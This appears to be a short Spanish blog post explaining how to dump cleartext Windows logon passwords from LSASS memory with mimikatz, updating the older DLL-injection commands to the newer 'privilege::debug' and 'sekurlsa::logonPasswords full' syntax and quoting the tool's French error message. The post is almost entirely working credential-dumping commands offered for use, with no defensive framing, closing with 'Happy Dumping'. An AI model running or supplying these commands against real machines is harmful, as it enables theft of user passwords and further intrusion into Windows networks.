privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswords
Pero ahora ya no hace falta inyectar la DLL, de hecho da el siguiente error:
========================================
Les fonctions suivantes NE SONT PLUS supportées via l'injection de la librairie
sekurlsa.dll :
@getLogonPasswords @getMSV(Functions) @getTsPkg(Functions)
@getWDigest(Functions) @getLiveSSP(Functions) @getKerberos(Functions)
Les mêmes fonctionnalités (et même plus !) sont disponibles SANS INJECTION :
sekurlsa::logonPasswords sekurlsa::msv sekurlsa::tspkg
sekurlsa::wdigest sekurlsa::livessp sekurlsa::kerberos
Vous pouvez décharger la librairie avec : @
Puis utiliser un module local, par exemple : sekurlsa::logonPasswords full
========================================
Por tanto, ahora es:
privilege::debug
sekurlsa::logonPasswords full
Con esto obtenemos las contraseñas (en claro) de los usuarios que se han logado en la máquina desde que la ha sido arrancada (porque están en memoria), pero no de todos los usuarios que se han logado alguna vez en la máquina.
Happy Dumping ;)
No hay comentarios:
Publicar un comentario